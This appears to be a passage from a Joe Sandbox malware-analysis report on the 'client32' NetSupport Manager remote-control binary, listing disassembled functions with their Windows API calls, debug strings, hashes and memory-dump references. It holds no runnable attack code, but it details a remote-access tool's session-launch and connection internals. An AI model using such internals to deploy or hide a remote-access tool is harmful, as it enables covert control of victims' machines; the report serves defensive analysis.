                                                                                                                                                                • API ID: wsprintf$CountErrorLastMessageTick$DebugOutputString_strrchr$CurrentDispatchReadStateThreadTranslate
                                                                                                                                                                • String ID: Exception caught at %x. Trying minidump.
                                                                                                                                                                • API String ID: 490122820-543155386
                                                                                                                                                                • Opcode ID: 2fc6aae1165e1eadac81f9b3d3da5e414a6db5acb2d45d699591467b478390dd
                                                                                                                                                                • Instruction ID: eed67cde3fb75ca7c288633e1f9c4b1d03945ae1a33bfc43050b2d2fe3e6b1e4
                                                                                                                                                                • Opcode Fuzzy Hash: 2fc6aae1165e1eadac81f9b3d3da5e414a6db5acb2d45d699591467b478390dd
                                                                                                                                                                • Instruction Fuzzy Hash: 4C21D675D04218ABD715DB64DCC5FE9F7B8AB5C709F0044A4E61597280EBB06E84CBA0
                                                                                                                                                                Function 11089150 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108918F
                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CEF56,?), ref: 110891A4
                                                                                                                                                                • LockResource.KERNEL32(00000000,?,00000000,?,110CEF56,?), ref: 110891D6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Resource$FindLoadLock
                                                                                                                                                                • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                                                                                                • API String ID: 2752051264-327499879
                                                                                                                                                                • Opcode ID: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                                                                                                • Instruction ID: ac104577f0cb8d44e6482e86c7e4f76e51294e6aac98140987b3b76ba3c25106
                                                                                                                                                                • Opcode Fuzzy Hash: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                                                                                                • Instruction Fuzzy Hash: 08110D3AF4C22556DB12EBE9AC45B69B7E89BC07A8B410475FC6CD71C4FA61D440C3E1
                                                                                                                                                                Function 11063160 Relevance: 149.1, APIs: 42, Strings: 43, Instructions: 353libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_version), ref: 11063177
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_installed), ref: 1106319C
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_netname), ref: 110631C2
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_remotename), ref: 110631E8
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_bridgename), ref: 1106320E
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_networks), ref: 11063234
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_pingnet), ref: 1106325A
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_open), ref: 11063280
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_close), ref: 110632A6
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_getsession), ref: 110632F2
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_call), ref: 11063318
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_hangup), ref: 1106333E
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_nsessions), ref: 11063364
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_connected), ref: 1106338A
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_send), ref: 110633B0
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_sendex), ref: 110633D6
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_sendif), ref: 110633EB
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_sendto), ref: 11063411
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_subset), ref: 1106341C
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_helpreq), ref: 11063468
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_maxpacket), ref: 1106348E
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_openremote), ref: 110634B4
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_closeremote), ref: 110634DA
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_callremote), ref: 11063500
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_pause), ref: 11063442
                                                                                                                                                                  • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_findslaves), ref: 110632CC
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_myaddr), ref: 11063526
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_loadbridge), ref: 11063531
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_getfailedreason), ref: 1106353C
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_escape), ref: 11063547
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_publishservice), ref: 11063552
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_publishserviceex), ref: 1106355D
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_findslavesex), ref: 1106356B
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_broadcastdata), ref: 11063576
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_sendname), ref: 11063584
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_getlouserpaddressinuse), ref: 11063592
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_clientpinrequest), ref: 110635A0
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_controlsendpin), ref: 110635AE
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_controlpinrequest), ref: 110635BC
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_clearpin), ref: 110635CA
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_getcodepage), ref: 110635D8
                                                                                                                                                                • GetProcAddress.KERNEL32(11074E10,ctl_getconnectivityinfo), ref: 110635E6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$ExitProcess$ErrorLastMessage_strrchrwsprintf
                                                                                                                                                                • String ID: ..\ctl32\Connect.cpp$ctl_bridgename$ctl_broadcastdata$ctl_call$ctl_callremote$ctl_clearpin$ctl_clientpinrequest$ctl_close$ctl_closeremote$ctl_connected$ctl_controlpinrequest$ctl_controlsendpin$ctl_escape$ctl_findslaves$ctl_findslavesex$ctl_getcodepage$ctl_getconnectivityinfo$ctl_getfailedreason$ctl_getlouserpaddressinuse$ctl_getsession$ctl_hangup$ctl_helpreq$ctl_installed$ctl_loadbridge$ctl_maxpacket$ctl_myaddr$ctl_netname$ctl_networks$ctl_nsessions$ctl_open$ctl_openremote$ctl_pause$ctl_pingnet$ctl_publishservice$ctl_publishserviceex$ctl_remotename$ctl_send$ctl_sendex$ctl_sendif$ctl_sendname$ctl_sendto$ctl_subset$ctl_version
                                                                                                                                                                • API String ID: 1096595926-1306570422
                                                                                                                                                                • Opcode ID: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                                                                                                • Instruction ID: 5f24de0e2360826035fa82522da9b4a10218173402b610a7b1cd1951dc97c3b7
                                                                                                                                                                • Opcode Fuzzy Hash: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                                                                                                • Instruction Fuzzy Hash: 96A15DBCF447927AD312AFB76C91FABFEE86F615D8B81042AF449E5901FA60F000C556
                                                                                                                                                                Function 1101D600 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 361windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 1101D690
                                                                                                                                                                • GetWindowTextLengthA.USER32(00000000), ref: 1101D699
                                                                                                                                                                • SendMessageA.USER32(00000000,000000B1,00000001,00000001), ref: 1101D6AE
                                                                                                                                                                • _memset.LIBCMT ref: 1101D6BF
                                                                                                                                                                • SendMessageA.USER32(00000000,0000043A,00000000,?), ref: 1101D6E6
                                                                                                                                                                • SendMessageA.USER32(00000000,0000043A,00000001,?), ref: 1101D6FE
                                                                                                                                                                • SendMessageA.USER32(00000000,00000444,00000001,?), ref: 1101D760
                                                                                                                                                                • LoadBitmapA.USER32(00000000,000013CD), ref: 1101D79F
                                                                                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 1101D7B5
                                                                                                                                                                  • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                                                                                                  • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$BitmapItemLengthLoadObjectTextWindow__strdup_free_memset
                                                                                                                                                                • String ID: Chat$DisableSmileys$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 3923228642-2891806625
                                                                                                                                                                • Opcode ID: c74fffa31febf9769478802a26479e915e76f1f16c361d565418096cbfb0c215
                                                                                                                                                                • Instruction ID: 9a3a4648e6df431800cb0a7fa6c4b0177097bf0927b2bbe13b50f344d0126f69
                                                                                                                                                                • Opcode Fuzzy Hash: c74fffa31febf9769478802a26479e915e76f1f16c361d565418096cbfb0c215
                                                                                                                                                                • Instruction Fuzzy Hash: 5CD19675E00229AFEB24DF64CC85FAEB7B9BB44704F0081D5E919AB285DB74AD44CF60
                                                                                                                                                                Function 11107430 Relevance: 59.9, APIs: 18, Strings: 16, Instructions: 408synchronizationthreadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000001,00000008,?,?,?,?,?), ref: 11107546
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?), ref: 1110755A
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11107588
                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000,00000001,110FE000,00000001,00000000,00000000,00000001,00000008,?,?,?,?,?), ref: 1110760E
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 11107615
                                                                                                                                                                • InterlockedExchange.KERNEL32(00000000,00000000), ref: 11107627
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00001388,?,?,?), ref: 11107639
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 11107659
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000207,00000000,00000001,00000008,?,?,?,?,?), ref: 11107679
                                                                                                                                                                • wsprintfA.USER32 ref: 111076A5
                                                                                                                                                                • SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 111077F8
                                                                                                                                                                • GetLastError.KERNEL32 ref: 11107802
                                                                                                                                                                • _memset.LIBCMT ref: 11107825
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 11107848
                                                                                                                                                                • GetPriorityClass.KERNEL32(00000000), ref: 1110784F
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 11107883
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 111078A4
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11107932
                                                                                                                                                                Strings
                                                                                                                                                                • /TS , xrefs: 1110773D
                                                                                                                                                                • Error. Null psi for session %d, xrefs: 111074AD
                                                                                                                                                                • Warning. Session %d disconnected - not launching client, xrefs: 111075CD
                                                                                                                                                                • Warning. WTSQuerySessionInformation(%d) failed - not launching client, e=%d, xrefs: 1110755E
                                                                                                                                                                • clientname, xrefs: 11107765
                                                                                                                                                                • /VistaUI , xrefs: 111076CC
                                                                                                                                                                • Error. settok(%x, seshid %d) ret %d, e=%d, xrefs: 1110780D
                                                                                                                                                                • D, xrefs: 11107834
                                                                                                                                                                • DisableConsoleClient, xrefs: 111076E8
                                                                                                                                                                • " %s , xrefs: 1110769F
                                                                                                                                                                • Error. terminating ui client, xrefs: 11107643
                                                                                                                                                                • Restarting client after aborted logoff., xrefs: 111074F1
                                                                                                                                                                • Error. ExecProcessAsUser ret %d, xrefs: 11107896
                                                                                                                                                                • Exec %d-%s ret %d (h=%x), xrefs: 1110790E
                                                                                                                                                                • /S , xrefs: 11107718
                                                                                                                                                                • CurrentSession %d appears invalid. Reset to -1, xrefs: 1110757B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$ErrorLast$CountPriorityTick$ClassCurrentExchangeFileInformationInterlockedModuleNameObjectProcessSingleThreadTokenWait_memsetwsprintf
                                                                                                                                                                • String ID: " %s $/S $/TS $/VistaUI $CurrentSession %d appears invalid. Reset to -1$D$DisableConsoleClient$Error. ExecProcessAsUser ret %d$Error. Null psi for session %d$Error. settok(%x, seshid %d) ret %d, e=%d$Error. terminating ui client$Exec %d-%s ret %d (h=%x)$Restarting client after aborted logoff.$Warning. Session %d disconnected - not launching client$Warning. WTSQuerySessionInformation(%d) failed - not launching client, e=%d$clientname
                                                                                                                                                                • API String ID: 161374856-1113802814
                                                                                                                                                                • Opcode ID: c58d180b3558540ad75e579067b834d4c43180a98eb3a7bdf316f64922136371
                                                                                                                                                                • Instruction ID: 91aea3661803dec28b3ae4f48bb2d9f520ca8aa3a68452e91682b0156efcc083
                                                                                                                                                                • Opcode Fuzzy Hash: c58d180b3558540ad75e579067b834d4c43180a98eb3a7bdf316f64922136371
                                                                                                                                                                • Instruction Fuzzy Hash: 2FE11774D0065A9FEB11DF64CD88FAAFBB4EF44308F1082A9E95997280EB719944CF91
                                                                                                                                                                Function 1106F690 Relevance: 52.8, APIs: 24, Strings: 6, Instructions: 333sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(?,59FD48C0,00000000,?,?), ref: 1106F716
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,59FD48C0,00000000,?,?), ref: 1106F729
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1106F72C
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 1106F739
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1106F73C
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 1106F746
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1106F749
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 1106F76A
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F7B4
                                                                                                                                                                • wsprintfA.USER32 ref: 1106F800
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1106F889
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1106F898
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1106F8A1
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1106F8B9
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1106F8D7
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1106F90E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$DecrementInterlocked$EnterLeave$Sleepwsprintf
                                                                                                                                                                • String ID: *slot == c$..\ctl32\Connect.cpp$DestroyThread finished, NULL lid$DestroyThread finished, cid==-1$DestroyThread finished, lwr==upr$slot %d, ppConn=%x, *ppConn=%x, c=%x
                                                                                                                                                                • API String ID: 2291750367-2321163575
                                                                                                                                                                • Opcode ID: ffc9d817b1687cccdfda9b510cf608883ebab596d38c18c87a17260cc501fcf2
                                                                                                                                                                • Instruction ID: d9920995edfa82a09cd3ff1c5cf6f1b3ec6b4d09dacc84edfcea4b061af5255a
                                                                                                                                                                • Opcode Fuzzy Hash: ffc9d817b1687cccdfda9b510cf608883ebab596d38c18c87a17260cc501fcf2
                                                                                                                                                                • Instruction Fuzzy Hash: E2D1B075E00255DFEB15CF64C894B9EB7F9BF48308F0581A9E41AA7241DB30AE41CFA1
                                                                                                                                                                Function 11017780 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 306windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetCursorInfo.USER32 ref: 110177B1
                                                                                                                                                                • GetIconInfo.USER32(?,?), ref: 110177DB
                                                                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 11017809
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11017820
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1101782D
                                                                                                                                                                • _memset.LIBCMT ref: 11017850
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110178E0
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110178F1
                                                                                                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 1101791C
                                                                                                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 1101793A
                                                                                                                                                                • _malloc.LIBCMT ref: 11017987
                                                                                                                                                                • GetBitmapBits.GDI32(?,?,00000000), ref: 110179A0
                                                                                                                                                                • _free.LIBCMT ref: 11017A9F
                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 11017AB7
                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 11017ABD
                                                                                                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11017AD5
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 11017AE3
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 11017AF7
                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11017B20
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 11017B2E
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 11017B3C
                                                                                                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 11017B6E
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 11017B83
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 11017B90
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 11017B93
                                                                                                                                                                • _memmove.LIBCMT ref: 11017BB0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
